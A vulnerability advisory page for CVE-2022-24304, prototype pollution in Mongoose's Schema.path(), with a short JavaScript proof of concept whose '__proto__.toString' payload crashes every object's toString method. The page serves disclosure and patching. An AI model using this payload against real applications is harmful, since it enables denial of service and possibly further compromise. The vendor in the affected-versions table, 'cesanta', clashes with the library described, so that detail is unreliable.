cbcvebase.
CVE-2022-24304
published 2022-08-27

CVE-2022-24304: Mongoose Vulnerable to Prototype Pollution in Schema Object ### Description Mongoose is a MongoDB object modeling tool designed to work in an asynchronous…

critical
Mongoose Vulnerable to Prototype Pollution in Schema Object

### Description
Mongoose is a MongoDB object modeling tool designed to work in an asynchronous environment.

Affected versions of this package are vulnerable to Prototype Pollution. The `Schema.path()` function is vulnerable to prototype pollution when setting the `schema` object. This vulnerability allows modification of the Object prototype and could be manipulated into a Denial of Service (DoS) attack.

### Proof of Concept
```js
// poc.js
const mongoose = require('mongoose');
const schema = new mongoose.Schema();

malicious_payload = '__proto__.toString'

schema.path(malicious_payload, [String])

x = {}
console.log(x.toString()) // crashed (Denial of service (DoS) attack)
```

### Impact
This vulnerability can be manipulated to exploit other types of attacks, such as Denial of service (DoS), Remote Code Execution, or Property Injection.

Affected

2 ranges
VendorProductVersion rangeFixed in
cesantamongoose>= 0 < 5.13.155.13.15
cesantamongoose>= 6.0.0 < 6.4.66.4.6
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.